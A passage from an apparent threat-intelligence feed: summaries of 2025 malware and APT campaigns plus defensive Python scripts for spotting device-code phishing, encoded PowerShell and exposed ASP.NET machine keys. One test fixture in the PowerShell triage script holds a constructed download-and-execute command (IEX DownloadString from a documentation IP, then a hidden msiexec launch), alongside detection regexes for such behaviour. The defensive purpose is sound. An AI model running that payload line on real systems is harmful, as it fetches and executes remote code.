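SCOPE_RE = re.compile(r"[A-Za-z]+(?:\.[A-Za-z]+)+|offline_access")


def device_code_signins(signins, nets=CORP_NETS):
    """Device-code sign-ins from outside the expected ranges.

    A user who pasted a code on a phishing page completes the flow legitimately,
    so the only anomaly is the protocol plus where the resulting session lives."""
    hits = []
    for s in signins:
        if s.get("authenticationProtocol") != "deviceCode":
            continue
        addr = ipaddress.ip_address(s["ipAddress"])
        if any(addr in n for n in nets):
            continue
        hits.append({"user": s["userPrincipalName"], "ip": s["ipAddress"],
                     "app": s.get("appDisplayName")})
    return hits


def risky_consents(audits, risky=RISKY_SCOPES):
    """Consent grants whose permission string includes any risky delegated scope."""
    hits = []
    for a in audits:
        if a.get("activityDisplayName") != "Consent to application":
            continue
        granted = set()
        for p in a.get("modifiedProperties", []):
            if p.get("displayName") == "ConsentAction.Permissions":
                granted.update(SCOPE_RE.findall(p.get("newValue", "")))
        bad = sorted(granted & risky)
        if bad:
            targets = a.get("targetResources") or [{"displayName": "?"}]
            hits.append({"app": targets[0]["displayName"], "scopes": bad})
    return hits


if __name__ == "__main__":
    print(device_code_signins(SAMPLE_SIGNINS))
    print(risky_consents(SAMPLE_AUDITS))
```

Both checks are cheap enough to run continuously; a hit on either should trigger revocation of the user's refresh tokens and, for consents, removal of the service principal's grant, since resetting the password alone does not invalidate a token the attacker already holds.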
2025-10-31
Manlingflower_Launches_New_Phishing_Campaign
MEDIUM
Intel Source:
360 Threat Intelligence Center
Intel Name:
Manlingflower_Launches_New_Phishing_Campaign
Date of Scan:
2025-10-31
Impact:
MEDIUM
Summary:
Researchers at the 360 Threat Intelligence Center have identified that APT-C-08, also known as Manlingflower, a South Asia–linked advanced persistent threat group, has launched a new phishing campaign leveraging ClickOnce application deployment files to remotely install malicious payloads. The operation entices victims to open deceptive Microsoft application files that initiate a multi-stage infection chain, beginning with the Microsoft.application payload, which retrieves a remote manifest and installs secondary binaries such as Launcher.exe, Microsoft.exe, and winsec.exe. Further analysis reveals that Microsoft.exe is a .NET self-contained binary compiled with dotnet publish to execute command-line tasks for persistence creation, while winsec.exe is a C# backdoor communicating with a command-and-control server at port 40269 using AES-encrypted traffic. The final payload maintains persistence via Windows scheduled tasks, beaconing system and user information to attacker infrastructure and enabling additional component downloads. Consistent with previous Manlingflower operations against government, defense, and academic entities in South Asia, the campaign’s objective appears to focus on intelligence collection, credential theft, lateral movement, and sustaining long-term espionage access within targeted networks.
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507424&idx=1&sn=8fbea6c6d8317d18e1265119afbeda67&poc_token=HFG-AWmj541Me4q4WVAAF2JbSgBmLWyqC2S-X1Qp
2025-10-31
PolarEdge_Expands_via_IoT_Proxy_Network
HIGH
Intel Source:
XLab
Intel Name:
PolarEdge_Expands_via_IoT_Proxy_Network
Date of Scan:
2025-10-31
Impact:
HIGH
Summary:
Researchers at XLab have uncovered RPX_Client, a new component of the PolarEdge malware ecosystem that integrates compromised IoT devices into a large-scale proxy relay system for covert operations. PolarEdge, first exposed by Sekoia in early 2025, operates an Operational Relay Box (ORB) model, an infrastructure-as-a-service framework leveraging infected IoT endpoints and VPS nodes to obfuscate malicious network traffic. The investigation identified over 140 active RPX servers and more than 25,000 infected devices across 40 countries, with concentrations in South Korea, China, and Southeast Asia. The RPX_Client module enables proxy relaying, remote command execution, and dynamic task redistribution between compromised devices and centralized control servers, allowing reverse-connection proxying that effectively conceals attacker origins through multi-hop IoT routing. The malware achieves persistence via system startup scripts and uses encrypted configuration files to maintain stealth and long-term control.
Source: https://blog.xlab.qianxin.com/smoking-gun-uncovered-rpx-relay-at-polaredges-core-exposed/
2025-10-30
Airstalk_Malware_Nation_State_Supply_Chain_Intrusion
HIGH
Intel Source:
Unit42
Intel Name:
Airstalk_Malware_Nation_State_Supply_Chain_Intrusion
Date of Scan:
2025-10-30
Impact:
HIGH
Summary:
Researchers at Palo Alto Networks Unit 42 have identified a new malware family named Airstalk being deployed in a suspected nation-state supply chain intrusion. The campaign leverages legitimate VMware AirWatch MDM APIs for covert command-and-control (C2) communications, allowing malicious traffic to blend seamlessly with authorized enterprise management activity. Two variants were discovered: a PowerShell-based loader and a .NET backdoor, both designed to exfiltrate data and maintain operational stealth. The PowerShell variant abuses the /api/mdm/devices/ endpoint to send serialized JSON commands for data theft, screenshots, and Chrome browser credential extraction, while the .NET variant incorporates multi-threaded execution for beaconing, debugging, and log exfiltration. Both samples were digitally signed with legitimate certificates to evade detection. The actor tracked as CL-STA-1009 has targeted organizations within the business process outsourcing (BPO) sector, exploiting trusted relationships to access sensitive client and infrastructure data.
Source: https://unit42.paloaltonetworks.com/new-windows-based-malware-family-airstalk/
2025-10-30
Russian_APT_Targets_Ukrainian_Organizations
HIGH
Intel Source:
Symantec and Carbon Black
Intel Name:
Russian_APT_Targets_Ukrainian_Organizations
Date of Scan:
2025-10-30
Impact:
HIGH
Summary:
Researchers at Symantec and Carbon Black have identified an ongoing campaign of Russian-attributed cyberattacks targeting Ukrainian organizations, particularly in the business services and local government sectors. Between June and August 2025, they observed two distinct intrusions characterized by the use of custom webshells, credential harvesting, and advanced Living-off-the-Land (LotL) techniques. The attackers exploited unpatched public-facing servers to deploy the Localolive webshell, previously linked by Microsoft to the Sandworm subgroup Seashell Blizzard, as an initial access vector. Demonstrating strong operational discipline, the actors minimized malware deployment and relied on native Windows utilities such as rundll32, rdrleakdiag, and PowerShell for persistence, reconnaissance, and evasion, even modifying Defender preferences to avoid detection.
Source: https://www.security.com/threat-intelligence/ukraine-russia-attacks
2025-10-29
BlueNoroff_GhostCall_and_GhostHire_Ops
HIGH
Intel Source:
Securelist (Kaspersky)
Intel Name:
BlueNoroff_GhostCall_and_GhostHire_Ops
Date of Scan:
2025-10-29
Impact:
HIGH
Summary:
Researchers at Kaspersky have identified two interrelated BlueNoroff operations, codenamed GhostCall and GhostHire, that represent a significant evolution in the group’s financially motivated cyber campaigns. BlueNoroff, a subgroup of the North Korean Lazarus organization, has expanded beyond its traditional bank-heist focus to target cryptocurrency, fintech, and venture-capital sectors through sophisticated macOS and Web3 social engineering. The GhostCall campaign uses fake video meeting invitations and fabricated Zoom or Microsoft Teams update prompts to deliver multi-stage payloads written in Swift, Rust, Go, and Nim, enabling cross-platform persistence and credential theft. Meanwhile, GhostHire impersonates legitimate recruiters on Telegram and GitHub to distribute trojanized development repositories and malicious TypeScript or Go projects to engineers and developers.
Source: https://securelist.com/bluenoroff-apt-campaigns-ghostcall-and-ghosthire/117842/
2025-10-28
Salt_Typhoon_Citrix_Exploit_Leads_to_Telecom_Intrusion
HIGH
Intel Source:
Darktrace
Intel Name:
Salt_Typhoon_Citrix_Exploit_Leads_to_Telecom_Intrusion
Date of Scan:
2025-10-28
Impact:
HIGH
Summary:
Researchers at Darktrace have identified a sophisticated intrusion campaign conducted by the China-linked APT group Salt Typhoon, also known as Earth Estries, GhostEmperor, and UNC2286. The campaign targeted a European telecommunications organization in July 2025, beginning with the exploitation of a Citrix NetScaler Gateway for initial access before pivoting to Citrix Virtual Delivery Agent hosts within the internal network. The attackers deployed a custom SNAPPYBEE (Deed RAT) backdoor through DLL sideloading using legitimate antivirus software, a hallmark of Salt Typhoon’s stealth and persistence techniques. The group demonstrated advanced evasion through multi-channel command-and-control using both HTTP and TCP-based protocols, consistent with its history of blending intelligence collection with geopolitical objectives. Darktrace’s Cyber AI Analyst detected anomalous behaviors early in the intrusion lifecycle, enabling rapid containment before significant lateral movement or data exfiltration occurred.
Source: https://www.darktrace.com/blog/salty-much-darktraces-view-on-a-recent-salt-typhoon-intrusion
2025-10-28
Agenda_Ransomware_Cross_Platform_BYOVD_Attack
HIGH
Intel Source:
Trend Micro
Intel Name:
Agenda_Ransomware_Cross_Platform_BYOVD_Attack
Date of Scan:
2025-10-28
Impact:
HIGH
Summary:
Researchers at Trend Micro have identified a sophisticated ransomware campaign conducted by the Agenda group, which deployed a Linux-based ransomware variant on Windows systems through the abuse of remote management tools and bring-your-own-vulnerable-driver (BYOVD) techniques. The operation leveraged legitimate tools such as ScreenConnect and Splashtop Remote to blend malicious activity with routine administrative behavior, complicating detection by standard endpoint defenses. Attackers initiated compromise via social engineering and fake CAPTCHA lures, which led to the download of multi-stage payloads and credential theft from Veeam backup infrastructure to disable recovery options. Following initial access, the group performed privilege escalation using proxy DLLs and PowerShell-based credential extraction, later deploying ransomware through remote sessions to both Windows and Linux systems.
Source: https://www.trendmicro.com/en_us/research/25/j/agenda-ransomware-deploys-linux-variant-on-windows-systems.html
2025-10-27
Lazarus_Targets_EU_Defense_Firms_in_DreamJob_Wave
HIGH
Intel Source:
ESET research
Intel Name:
Lazarus_Targets_EU_Defense_Firms_in_DreamJob_Wave
Date of Scan:
2025-10-27
Impact:
HIGH
Summary:
Researchers at ESET have identified a new wave of Operation DreamJob, a cyberespionage campaign conducted by Lazarus, a North Korea–aligned APT group, targeting European defense companies involved in UAV (drone) development. Beginning in March 2025, the campaign leveraged social engineering job-offer lures, trojanized open-source software, and DLL side-loading to deploy ScoringMathTea, a remote access trojan (RAT) providing full system control. Victims included three European defense entities, a metal engineering firm, an aircraft components manufacturer, and a defense company, several of which develop UAV hardware or software currently used in Ukraine. ESET assesses with high confidence that Lazarus aimed to steal proprietary designs and manufacturing knowledge to support North Korea’s domestic drone program. This wave showed notable technical advancements, including DLL proxying, AES/ChaCha20 encryption, and the use of GitHub-hosted open-source tools such as MuPDF, DirectX Wrappers, WinMerge, and Notepad++ plugins as malware loaders. The command-and-control (C2) infrastructure relied on compromised WordPress servers using HTTP(S) and base64-encoded encrypted traffic.
Source: https://www.welivesecurity.com/en/eset-research/gotta-fly-lazarus-targets-uav-sector/
2025-10-27
Remcos_RAT_Using_Fileless_Phishing_Attacks
HIGH
Intel Source:
CyberProof
Intel Name:
Remcos_RAT_Using_Fileless_Phishing_Attacks
Date of Scan:
2025-10-27
Impact:
HIGH
Summary:
Researchers from CyberProof have identified a significant surge in Remcos RAT campaigns between September and October 2025, distributed through phishing emails containing malicious compressed attachments disguised as business inquiries. The attacks employed fileless execution via obfuscated PowerShell scripts and process hollowing of msiexec.exe into RmClient.exe, effectively evading EDR detection. Once installed, Remcos attempted to access and exfiltrate browser-stored credentials, enabling persistent access to compromised systems. The infection chain began with a .gz attachment that unpacked a malicious batch file executing an encoded PowerShell payload, which retrieved additional components and established command-and-control communications. By leveraging legitimate Microsoft-signed binaries (LOLBins) and encoded PowerShell, the attackers achieved stealthy persistence and credential theft without deploying traditional executables. Although this campaign primarily targeted the financial sector, its credential-harvesting objectives suggest broader risks, as the stolen access could facilitate future ransomware deployments or lateral movement within networks.
Source: https://www.cyberproof.com/blog/fileless-remcos-attacks-on-the-rise/
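The chain above hinges on an encoded PowerShell command launched from a batch file. The following added example (not CyberProof's detection content) shows the triage step a SOC analyst would script for process-creation logs: find the -EncodedCommand switch, decode the UTF-16LE base64 payload, and score the decoded script plus its command line against a small indicator set. The log lines, hostnames, URL, payload and the indicator list are constructed assumptions for illustration, not published rules.

```python
"""Decode and triage PowerShell -EncodedCommand invocations in process-creation logs.

Added example for this feed entry; it is not CyberProof's detection content. The log
lines, hostnames, URL and payload are constructed, and the indicator patterns are an
assumption about what a first-pass triage should look for, not a published rule.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# The -e/-en/-enc/-EncodedCommand switch followed by its base64 argument.
_ENC_RE = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Behaviours common to fileless loaders of this kind (assumed indicator set).
_INDICATORS = {
    "download":   re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "invoke":     re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden":     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "lolbin":     re.compile(r"\b(?:msiexec|mshta|regsvr32|rundll32)\b", re.I),
    "reflection": re.compile(r"\[reflection\.assembly\]|::load\(", re.I),
}

@dataclass
class Finding:
    host: str
    parent: str
    decoded: str
    hits: List[str] = field(default_factory=list)

def encode_command(script: str) -> str:
    """Produce the UTF-16LE base64 form PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_command(blob: str) -> str:
    """Inverse of encode_command; raises ValueError/UnicodeDecodeError on garbage."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")

def triage_line(line: str) -> Optional[Finding]:
    """Parse one constructed log line of the form host="..." parent="..." cmd="..."."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    cmd = fields.get("cmd", "")
    m = _ENC_RE.search(cmd)
    if not m:
        return None
    try:
        decoded = decode_command(m.group(1))
    except (ValueError, UnicodeDecodeError):
        return None
    text = cmd + "\n" + decoded   # switches live on the command line, behaviour in the script
    hits = [name for name, rx in _INDICATORS.items() if rx.search(text)]
    return Finding(fields.get("host", "?"), fields.get("parent", "?"), decoded, hits)

def triage(lines) -> List[Finding]:
    """Return only encoded invocations that matched at least one indicator."""
    out = []
    for line in lines:
        f = triage_line(line)
        if f and f.hits:
            out.append(f)
    return out

# Constructed sample: stage-1 PowerShell pulls a second stage and starts msiexec for hollowing.
SAMPLE_PAYLOAD = ("$c=New-Object Net.WebClient;"
                  "IEX $c.DownloadString('http://198.51.100.7/stage2.ps1');"
                  "Start-Process msiexec.exe -WindowStyle Hidden")
SAMPLE_LOGS = [
    f'host="ws01" parent="cmd.exe" cmd="powershell.exe -w hidden -enc {encode_command(SAMPLE_PAYLOAD)}"',
    'host="ws02" parent="explorer.exe" cmd="powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"',
    f'host="ws03" parent="explorer.exe" cmd="powershell.exe -enc {encode_command("Get-Date")}"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOGS):
        print(f.host, f.parent, f.hits)
        print("   ", f.decoded)
```

The decode step matters more than the indicator list: an encoded command that decodes to Get-Date (ws03) is noise, while the ws01 line only reveals the download, IEX and msiexec behaviour after decoding. Feed real process-creation events through triage() by mapping your log schema onto the host/parent/cmd fields.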
2025-10-26
REF3927_Exploits_IIS_Servers_via_TOLLBOOTH
HIGH
+
Intel Source:
Elastic Security Labs
Intel Name:
REF3927_Exploits_IIS_Servers_via_TOLLBOOTH
Date of Scan:
2025-10-26
Impact:
HIGH
Summary:
Researchers from Elastic Security Labs, in collaboration with Texas A&M University System (TAMUS) Cybersecurity, analyzed the REF3927 campaign, which exploits misconfigured IIS servers that reuse publicly exposed ASP.NET machine keys. The threat actor, believed to be Chinese-speaking, deploys a malicious IIS module named TOLLBOOTH to perform SEO cloaking and monetization. Initial access is gained through ViewState deserialization attacks, which yield command execution in the IIS service context. Post-compromise tools include a Godzilla fork webshell (“Z-Godzilla_ekp”), GotoHTTP for remote access, and a modified “Hidden” rootkit for stealthy persistence. TOLLBOOTH exposes a webshell and management channels while manipulating SEO by redirecting human visitors to malicious landing pages and serving keyword-optimized content to search engines. The infrastructure uses multiple C2 domains to coordinate link farming across more than 570 compromised IIS servers worldwide, with deliberate geofencing that excludes mainland China, a pattern consistent with China-based threat actors.
Source: https://www.elastic.co/security-labs/tollbooth
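The root cause in this campaign is a static machineKey copied from a public source: anyone holding the validation key can forge a signed ViewState and reach the deserialization sink. As an added example (not Elastic's tooling), the audit below parses a web.config, flags keys that match a known-public list, weak validation/decryption algorithms, and enableViewStateMac=false. KNOWN_PUBLIC_KEYS holds constructed placeholders; in practice load it from a published list of disclosed keys such as the one Microsoft distributes with its machineKey guidance. Both sample configs are constructed, and the hardened one's key is not a value to copy.

```python
"""Flag ASP.NET web.config settings that make ViewState deserialization exploitable.

Added example for this entry, not Elastic's tooling. KNOWN_PUBLIC_KEYS holds constructed
placeholder values; in practice load the published lists of disclosed machine keys.
The sample configs below are constructed, including the "hardened" key.
"""
import xml.etree.ElementTree as ET
from typing import List

# Placeholder entries standing in for publicly disclosed keys (constructed, not real leaks).
KNOWN_PUBLIC_KEYS = {
    "0123456789ABCDEF" * 8,            # 128 hex chars, validationKey-sized
    "FEDCBA9876543210" * 4,            # 64 hex chars, decryptionKey-sized
}
WEAK_VALIDATION = {"MD5", "SHA1"}      # HMACSHA256 or stronger is the current baseline
WEAK_DECRYPTION = {"DES", "3DES"}      # AES is expected

def _key(mk: ET.Element, attr: str) -> str:
    # Strip the optional ",IsolateApps" modifier and normalise case for comparison.
    return (mk.get(attr) or "AutoGenerate").split(",")[0].strip().upper()

def audit_web_config(xml_text: str) -> List[str]:
    """Return findings for one web.config document (empty list means nothing flagged)."""
    root = ET.fromstring(xml_text)
    findings: List[str] = []
    mk = root.find("./system.web/machineKey")
    if mk is not None:
        static_keys = [k for k in (_key(mk, "validationKey"), _key(mk, "decryptionKey"))
                       if "AUTOGENERATE" not in k]
        if any(k in KNOWN_PUBLIC_KEYS for k in static_keys):
            findings.append("machineKey matches a publicly disclosed key; rotate it now")
        if mk.get("validation", "").upper() in WEAK_VALIDATION:
            findings.append(f"weak ViewState MAC algorithm: {mk.get('validation')}")
        if mk.get("decryption", "").upper() in WEAK_DECRYPTION:
            findings.append(f"weak ViewState encryption: {mk.get('decryption')}")
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac=false: ViewState is not integrity-checked at all")
    return findings

# Constructed: the key is one from the placeholder "public" list, algorithms are legacy.
SAMPLE_VULNERABLE = f"""<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="{'0123456789ABCDEF' * 8}"
                decryptionKey="{'FEDCBA9876543210' * 4}"
                validation="SHA1" decryption="3DES" />
    <pages enableViewStateMac="false" />
  </system.web>
</configuration>"""

# Constructed: unique-looking key with current algorithms. Generate your own in production.
SAMPLE_HARDENED = """<configuration>
  <system.web>
    <machineKey validationKey="A1B2C3D4E5F60718293A4B5C6D7E8F90A1B2C3D4E5F60718293A4B5C6D7E8F90A1B2C3D4E5F60718293A4B5C6D7E8F90A1B2C3D4E5F60718293A4B5C6D7E8F90"
                decryptionKey="00112233445566778899AABBCCDDEEFF00112233445566778899AABBCCDDEEFF"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

if __name__ == "__main__":
    for label, cfg in (("vulnerable", SAMPLE_VULNERABLE), ("hardened", SAMPLE_HARDENED)):
        print(label, audit_web_config(cfg) or ["ok"])
```

The check only looks at the common placement under system.web; keys can also be set in location blocks or at the machine level (machine.config, applicationHost.config), so walk those too when auditing a fleet. A key that matches a public list needs rotation on every node of the web farm at once, otherwise ViewState breaks between nodes.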
2025-10-26
TransparentTribe_DeskRAT_Linux_Espionage
HIGH
+
Intel Source:
Sekoia
Intel Name:
TransparentTribe_DeskRAT_Linux_Espionage
Date of Scan:
2025-10-26
Impact:
HIGH
Summary:
Researchers at Sekoia.io have identified a renewed cyber-espionage campaign by the TransparentTribe (APT36) group targeting Indian military and government organizations through a new Golang-based remote access trojan dubbed DeskRAT. Active since mid-2025, the campaign uses phishing emails carrying ZIP archives that masquerade as legitimate defense-related documents. When the victim opens the malicious .desktop file inside, the infection chain retrieves and launches a binary payload while displaying a benign PDF decoy to disguise the activity. DeskRAT establishes command and control over WebSocket and supports remote command execution, file browsing, data exfiltration, and persistence installation on Linux hosts. It uses several persistence mechanisms, including systemd services, cron jobs, and bash scripts, which makes it more resilient within targeted environments.
Source: https://blog.sekoia.io/transparenttribe-targets-indian-military-organisations-with-deskrat/
2025-10-26
Warlock_Ransomware_Linked_to_China_Based_APT
HIGH
+
Intel Source:
Symantec and Carbon Black
Intel Name:
Warlock_Ransomware_Linked_to_China_Based_APT
Date of Scan:
2025-10-26
Impact:
HIGH
Summary:
Researchers at Symantec and Carbon Black have linked the Warlock ransomware, first detected in June 2025, to a China-based threat group whose activity dates back to at least 2019. This group exploited a zero-day vulnerability in Microsoft SharePoint (CVE-2025-53770) using the ToolShell exploit, which has also been used by other China-linked APTs such as Budworm (APT27), Sheathminer (APT31), and Storm-2603. Warlock is often deployed alongside or as a replacement for LockBit 3.0, commonly through DLL sideloading involving 7z.exe and a malicious 7z.dll. In August 2025, Symantec confirmed Warlock attacks on a U.S. firm and a Middle Eastern engineering company, both involving sideloaded 7z.dll loaders and the .x2anylock extension appended to encrypted files. Further analysis uncovered a defense evasion tool signed with a stolen certificate (“coolschool”) and the use of a vulnerable Baidu driver, renamed googleapiutil64.sys, in a Bring Your Own Vulnerable Driver (BYOVD) technique. The same certificate was previously associated with the Chinese APT group CamoFei (aka ChamelGang), tying Warlock to espionage and ransomware campaigns going back to 2019.
Source: https://www.security.com/threat-intelligence/warlock-ransomware-origins
2025-10-25
warmcookie_Evolving_backdoor_with_fileless_execution
MEDIUM
+
Intel Source:
Picus Security
Intel Name:
warmcookie_Evolving_backdoor_with_fileless_execution
Date of Scan:
2025-10-25
Impact:
MEDIUM
Summary:
"WARMCOOKIE is a backdoor recently analyzed by Picus Security that has evolved to become stealthier and more flexible. The latest version can run many kinds of payloads directly in memory, which makes it difficult for antivirus tools to detect, and it hides by using random but professional-looking names for its folders and scheduled tasks so that it resembles normal company software. Researchers also found that the operators reuse the same digital (TLS) certificates across many servers and do not renew them, suggesting they rebuild their infrastructure frequently. Overall, Picus Security found that WARMCOOKIE is now better at hiding, harder to detect, and more adaptable, which means defenders need to watch for suspicious behavior rather than rely on basic virus scans."
Source: https://www.picussecurity.com/resource/blog/warmcookie-a-technical-deep-dive-into-a-persistent-backdoors-evolution
2025-10-25
PhantomCaptcha_Spearphishing_Targets_Ukraine_NGOs
HIGH
+
Intel Source:
SentinelOne
Intel Name:
PhantomCaptcha_Spearphishing_Targets_Ukraine_NGOs
Date of Scan:
2025-10-25
Impact:
HIGH
Summary:
Researchers at SentinelLABS and the Digital Security Lab of Ukraine have identified a coordinated spearphishing campaign, codenamed PhantomCaptcha, targeting humanitarian and governmental organizations supporting Ukraine’s war relief efforts. The operation involved weaponized PDF documents impersonating official Ukrainian government correspondence to deliver a multi-stage malware payload. Upon opening, victims were lured into executing a malicious PowerShell command under the guise of a CAPTCHA verification process designed to mimic legitimate Cloudflare security checks. The subsequent infection chain delivered an obfuscated downloader, reconnaissance modules, and a WebSocket-based remote access trojan capable of executing arbitrary commands on the compromised host. Analysis indicates the attackers demonstrated advanced planning, operational security, and compartmentalized infrastructure management, consistent with a state-sponsored or highly organized threat group. The campaign briefly operated in early October 2025 but exhibited precision and technical sophistication suggesting prior preparation.
Source: https://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/
2025-10-24
Earth_Krahang_APT_Global_Gov_Cyberespionage
HIGH
+
Intel Source:
Picus Security
Intel Name:
Earth_Krahang_APT_Global_Gov_Cyberespionage
Date of Scan:
2025-10-24
Impact:
HIGH
Summary:
Researchers at Picus Security have identified the Earth Krahang APT group as a cyberespionage actor active since early 2022, conducting coordinated campaigns against government organizations across 23 countries spanning Southeast Asia, Europe, the Americas, and Africa. The group’s operations exploit intergovernmental trust by compromising official infrastructure and using it to launch attacks against other government entities. Earth Krahang has demonstrated advanced operational discipline, achieving at least 70 confirmed intrusions targeting ministries and diplomatic agencies. Its tactics include spear-phishing campaigns using compromised government mailboxes, exploitation of public-facing applications, and abuse of trusted relationships to deliver payloads and establish persistent access. The threat actors employ custom malware loaders, legitimate remote-access tools, and privilege escalation exploits across Windows and Linux systems to maintain footholds and extract sensitive data. Their campaigns reveal a focus on long-term intelligence collection rather than immediate disruption, aligning with traditional state-sponsored espionage patterns.
Source: https://www.picussecurity.com/resource/blog/earth-krahang-apt-group-global-government-cyberespionage-campaigns-2022-2024-and-ttp-analysis
2025-10-24
TigerJack_Malicious_Developer_Extensions
HIGH
+
Intel Source:
Koi Security
Intel Name:
TigerJack_Malicious_Developer_Extensions
Date of Scan:
2025-10-24
Impact:
HIGH
Summary:
Researchers at Koi Security have identified a coordinated malware campaign dubbed TigerJack, which systematically targets software developers through trojanized Visual Studio Code and OpenVSX extensions. Active since early 2025, TigerJack’s operation leverages multiple malicious extensions that impersonate legitimate development utilities, enabling the theft of proprietary source code, credentials, and system resources. Once installed, these extensions secretly exfiltrate code, mine cryptocurrency, and establish remote control channels for persistent access. The campaign demonstrates a high degree of sophistication through tactics such as multi-account publishing, cross-market republishing, and the use of benign initial uploads followed by malicious updates to build user trust before compromise.
Source: https://www.koi.ai/blog/tiger-jack-malicious-vscode-extensions-stealing-code
2025-10-24
AdaptixC2_npm_Supply_Chain_Attack
HIGH
+
Intel Source:
Securelist (Kaspersky)
Intel Name:
AdaptixC2_npm_Supply_Chain_Attack
Date of Scan:
2025-10-24
Impact:
HIGH
Summary:
Researchers at Kaspersky have identified a malicious npm package delivering the AdaptixC2 post-exploitation framework, a tool comparable in capability to Cobalt Strike. The package, disguised as a legitimate proxy utility, was uploaded to the npm registry under the name “https-proxy-utils” and executed its payload automatically after installation. AdaptixC2 operates across Windows, macOS, and Linux, and the package used techniques such as DLL sideloading, autorun persistence, and execution from temporary directories to deploy its implant. Once active, the framework gives attackers full remote control, command execution, file and process management, and persistence. The campaign underscores a broader trend of threat actors weaponizing trusted open-source ecosystems like npm for initial access and post-exploitation. It mirrors earlier incidents such as the Shai-Hulud worm campaign, reflecting a sustained increase in abuse of public software repositories to infiltrate developer environments and downstream users.
Source: https://securelist.com/adaptixc2-agent-found-in-an-npm-package/117784/
2025-10-24
Maverick_Banking_Trojan_Distribute_WhatsApp
MEDIUM
+
Intel Source:
Securelist
Intel Name:
Maverick_Banking_Trojan_Distribute_WhatsApp
Date of Scan:
2025-10-24
Impact:
MEDIUM
Summary:
Researchers at Securelist have identified a large-scale malware campaign in Brazil distributing a new banking Trojan dubbed Maverick through malicious LNK files delivered via WhatsApp. The infection chain employs multiple obfuscated .NET loaders that utilize techniques such as control flow flattening and string encryption to conceal their activity before deploying the final banking payload. Once installed, Maverick automates WhatsApp Web to message victims’ contacts, helping it spread further, and runs a separate agent focused on stealing banking information from specific browsers used in Brazil. The malware features remote control, keylogging, screen capture, browser manipulation, and secure communication over a WebSocket-based C2 channel. It maintains persistence through PowerShell scripts and Startup folder entries. The campaign exhibits notable similarities to the earlier Coyote banking Trojan, including the use of encrypted configurations and a focus on financial theft and session hijacking targeting Brazilian users.
Source: https://securelist.com/maverick-banker-distributing-via-whatsapp/117715/
2025-10-23
F5_BIG_IP_Breach_Enables_UNC5221_BRICKSTORM_Attack
HIGH
+
Intel Source:
Resecurity
Intel Name:
F5_BIG_IP_Breach_Enables_UNC5221_BRICKSTORM_Attack
Date of Scan:
2025-10-23
Impact:
HIGH
Summary:
Resecurity researchers have reported that the China-nexus threat actor UNC5221 is conducting state-sponsored cyber campaigns using a backdoor known as BRICKSTORM, following a confirmed F5 Networks breach that exposed BIG-IP source code and vulnerability data. The breach, disclosed under U.S. Department of Justice authorization, was kept confidential until October 2025 due to national security concerns. Attackers maintained persistence within F5’s environment for at least 12 months, indicating a sophisticated, long-term compromise. BRICKSTORM, a Go-based ELF implant designed for network appliances with restricted userland environments, supports TLS-encrypted WebSocket C2, SOCKS-style proxying, and multipart/form-data exfiltration to blend with normal web traffic. Its use of Yamux multiplexing enables concurrent command channels over a single TLS session, enhancing stealth and efficiency. The analysis revealed credential-harvesting servlet filters and systemd-based persistence mechanisms, with activity aligning to multiple MITRE ATT&CK techniques such as exploitation of public-facing applications, protocol tunneling, and encrypted C2.
Source: https://www.resecurity.com/blog/article/f5-big-ip-source-code-leak-tied-to-state-linked-campaigns-using-brickstorm-backdoor
2025-10-23
Cavalry_Werewolf_FoalShell_and_StallionRAT_Campaign
HIGH
+
Intel Source:
Picus Security
Intel Name:
Cavalry_Werewolf_FoalShell_and_StallionRAT_Campaign
Date of Scan:
2025-10-23
Impact:
HIGH
Summary:
Researchers at Picus Security have identified an advanced campaign by the threat group Cavalry Werewolf (also tracked as YoroTrooper and Silent Lynx), active between May and August 2025, targeting Russia's public sector and key industries including energy, mining, and manufacturing. The group used trusted-relationship spear-phishing emails masquerading as official Kyrgyz government correspondence to deliver custom malware. Two primary tools were observed: FoalShell, a reverse shell with variants written in C#, C++, and Go, and StallionRAT, a Telegram-controlled remote access trojan also built in several languages, including Go, PowerShell, and Python. FoalShell enables command execution through concealed command-line processes, while StallionRAT handles exfiltration, file manipulation, and remote command execution over Telegram-based command-and-control channels.
Source: https://www.picussecurity.com/resource/blog/cavalry-werewolf-apt
2025-10-23
MuddyWater_Delivers_Phoenix_v4_in_MENA_Campaign
HIGH
+
Intel Source:
Group-IB
Intel Name:
MuddyWater_Delivers_Phoenix_v4_in_MENA_Campaign
Date of Scan:
2025-10-23
Impact:
HIGH
Summary:
Researchers at Group-IB observed the Iran-linked APT group MuddyWater running a phishing campaign against more than 100 government and international organizations across the Middle East and North Africa (MENA), delivering the Phoenix v4 backdoor. The operators used a compromised mailbox, accessed through NordVPN, to send credible phishing emails carrying malicious Microsoft Word attachments. Once a victim enabled macros, a VBA loader called FakeUpdate deployed the Phoenix v4 payload, which established persistence and beaconed to its C2 domain. The same C2 host also served commercial remote management tools (Action1, PDQ) and a browser credential stealer (Chromium_Stealer), pointing to a modular toolkit for espionage and remote administration. Phoenix v4 uses COM-based persistence, modified registry keys, and WinHTTP for network communication, consistent with MuddyWater's known tradecraft. Targeting focused heavily on embassies and diplomatic and foreign-affairs organizations (79% of targets), underscoring a geopolitical espionage motive. The infrastructure, hosted in a Namecheap ASN and obscured behind Cloudflare and NordVPN exit nodes in France, was active for about five days before being taken down.
Source: https://www.group-ib.com/blog/muddywater-espionage/
2025-10-23
Weaponized_MSIX_Packages
HIGH
+
Intel Source:
Splunk
Intel Name:
Weaponized_MSIX_Packages
Date of Scan:
2025-10-23
Impact:
HIGH
Summary:
